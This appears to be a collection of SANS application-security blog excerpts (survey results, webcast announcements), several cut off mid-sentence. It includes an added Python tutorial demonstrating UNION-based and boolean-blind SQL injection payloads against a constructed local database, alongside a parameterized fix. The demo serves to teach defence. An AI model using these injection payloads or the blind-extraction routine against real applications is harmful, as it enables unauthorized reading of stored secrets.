For the second year in a row, Jim Bird and I have helped SANS put together the "Survey on Application Security Programs and Practices". We asked some of the same questions as last year, just phrased differently. Some interesting trends this year, taken from the executive summary of the soon-to-be-published paper, include the following:
- There was a significant increase in the number of organizations implementing application security programs and practices. The percentage of organizations with an active AppSec program rose from 66% last year to 83% this year, and many of the organizations that do not yet have a formal program in place are at least following some kind of ad hoc security practices.
- Organizations are testing more frequently. In this year's survey, more than one-third are doing continuous, ongoing security testing of their applications, whereas only 23% indicated doing so in our ...
SANS has just opened a survey to understand more about the challenges and risks that companies are facing in application security, and what tools and practices people have found are most effective in managing appsec problems.
Please follow this link and take 5-10 minutes to answer the survey questions:
Help shape the future of application security practices and technologies and also enter to win a $300 American Express gift card, which will be awarded to one lucky winner!
Sponsored by NT OBJECTives, Qualys, Whitehat Security and Veracode, this survey will remain online until November 7, 2012. Results will be published at http://www.sans.org/info/113477 on December 13, 2012, during a related
Here are some recent appsec webcasts for your viewing pleasure:
- Web Application Threats: Combining XSS and CSRF to own the world!
Kevin Johnson covers Cross-Site Scripting (XSS) and Cross-Site Request Forgery (CSRF). Specifically, "how they can be used to exploit users and applications, how to find them and what their combined power can accomplish."
- Innovation in Application Security: Application Risk Management
John Sapp discusses "business critical application security trends and the need for comprehensive approaches to secure software development" including coverage of what "application attacks are most prevalent now, the importance of the secure development lifecycle (SDL), and cost-effective methods to implement a program-level commitment to
We have three cool webcasts lined up next week:
1) SQL Injection for the Penetration Tester on April 27
Eric Conrad will kick off the week of webcasts with something every penetration tester should know about. "Both normal and blind SQL attacks will be described, including reading and altering databases, creating local files, and gaining command shell access to the database server."
2) Defending Web Applications: Going back to First Principles on April 28
In this talk Johannes and Jason "will outline current attacks against web applications, why they evade detection by network defenses and how to build defensible applications by going back to simple defensive principles. Each of the attacks will be illustrated from a defensive as well as offensive point of view showing the
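The SQL injection webcast above contrasts "normal" injection, where query results are echoed back to the attacker, with blind injection, where the page only answers yes or no. The following is an added example, not code from the webcast or from the original post: it builds a constructed in-memory SQLite database with a hypothetical `users(name, secret)` table, a lookup written by string concatenation, and a parameterized version of the same lookup. `vulnerable_profile` shows the direct (UNION-based) read; `blind_extract` recovers a secret character by character from nothing but the true/false answer of `vulnerable_exists`, using a binary search over printable ASCII so each character costs about seven requests instead of one per candidate. Run against the parameterized `safe_exists`, the same payloads recover nothing.

```python
import sqlite3


def make_db():
    """Constructed sample data (assumption: a users table with a secret column)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "s3cr3t"), ("admin", "hunter2")],
    )
    conn.commit()
    return conn


def vulnerable_profile(conn, name):
    """Hypothetical page that echoes query results: a 'normal' injection sink.
    The name is concatenated into the SQL, so a UNION clause can append
    arbitrary columns from any table to the visible output."""
    sql = f"SELECT name FROM users WHERE name = '{name}'"
    return [row[0] for row in conn.execute(sql).fetchall()]


def vulnerable_exists(conn, name):
    """Hypothetical 'is this user registered?' check, also built by concatenation.
    It reveals only True/False, which is all a blind attacker needs."""
    sql = f"SELECT 1 FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchone() is not None


def safe_exists(conn, name):
    """The same check with a bound parameter: the input is data, never SQL."""
    row = conn.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


def blind_extract(oracle, target_user, max_len=64):
    """Boolean-based blind extraction of users.secret for target_user.

    `oracle(payload)` must return the yes/no answer of the target page.
    Each payload closes the string literal, appends a condition on the
    secret, and comments out the trailing quote with `--`.
    """
    recovered = ""
    for pos in range(1, max_len + 1):
        # Stop as soon as the secret has no character at this position.
        if not oracle(f"{target_user}' AND length(secret) >= {pos}--"):
            break
        # Binary search the code point of character `pos` over printable ASCII.
        lo, hi = 32, 126
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(
                f"{target_user}' AND unicode(substr(secret,{pos},1)) > {mid}--"
            ):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered


if __name__ == "__main__":
    conn = make_db()
    # Normal injection: the secrets land directly in the page output.
    print(vulnerable_profile(conn, "x' UNION ALL SELECT secret FROM users--"))
    # Blind injection: the same data, reconstructed from yes/no answers.
    print(blind_extract(lambda p: vulnerable_exists(conn, p), "admin"))
    # Parameterized query: the payload is just an unknown user name.
    print(repr(blind_extract(lambda p: safe_exists(conn, p), "admin")))
```

The `length(secret) >= pos` probe is what terminates the loop: without it the search would keep "finding" characters past the end of the string, because `substr` past the end returns an empty string and every comparison then evaluates to false. Real targets usually need the same idea applied to timing rather than page content, but the inference logic is identical.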
Felipe Moreno will be giving a webcast on Groundspeed, a Firefox add-on that lets penetration testers manipulate the interface of a web application and adapt it to the needs of the test, removing annoying client-side limitations and making the test more efficient.
"Not much has changed since the beginning of web application penetration testing in terms of process for performing manual input validation tests. Place a client proxy between the browser and the application, generate requests, intercept them and modify the HTTP parameters. It's true that we have seen some nice improvements at the client proxy level (compare the old Achilles to the latest version of the Burp suite), but the general approach still remains the same. This webcast will propose a new way to look at input data and a new approach to manually test